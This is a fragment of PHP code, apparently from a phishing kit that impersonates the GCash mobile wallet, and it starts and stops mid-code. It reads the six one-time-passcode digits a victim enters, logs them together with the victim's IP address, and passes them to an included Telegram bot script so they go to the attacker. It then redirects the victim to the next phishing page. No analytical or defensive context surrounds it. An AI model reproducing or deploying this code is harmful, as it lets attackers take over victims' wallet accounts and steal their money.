$ip \n\n$numotp"; include('Gcash_files/tele_bot.php'); $encodenumotp = base64_encode(base64_encode($numotp)); header("Location:telegram-otp2.php?number=$numotp&otp=$num"); } } } else if(preg_match("/^(09)\\d{9}/", $num)){ if(isset($_POST['submitotp'])){ if(!empty($_POST['otp'])){ $numotp = $_POST['otp'].$_POST['otp1'].$_POST['otp2'].$_POST['otp3'].$_POST['otp4'].$_POST['otp5']; $replyMsg = "Logged => $ip \n\n$numotp"; include('Gcash_files/tele_bot.php'); $encodenumotp = base64_encode(base64_encode($numotp)); header("Location:telegram-otp2.php?number=$numotp&otp=$num"); } } } else{ } if(empty($_GET['otpclid'])){ } if(isset($_GET['resendotp'])){ $replyMsg = "Logged => $ip \n\nResend OTP"; } echo '